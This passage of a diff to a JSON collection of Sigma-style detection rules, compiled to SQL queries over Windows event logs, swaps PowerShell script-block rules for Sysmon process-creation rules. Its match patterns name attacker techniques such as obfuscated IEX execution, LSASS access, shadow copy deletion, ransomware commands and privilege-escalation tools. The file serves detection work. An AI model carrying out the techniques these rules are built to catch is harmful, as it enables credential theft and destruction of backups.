ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 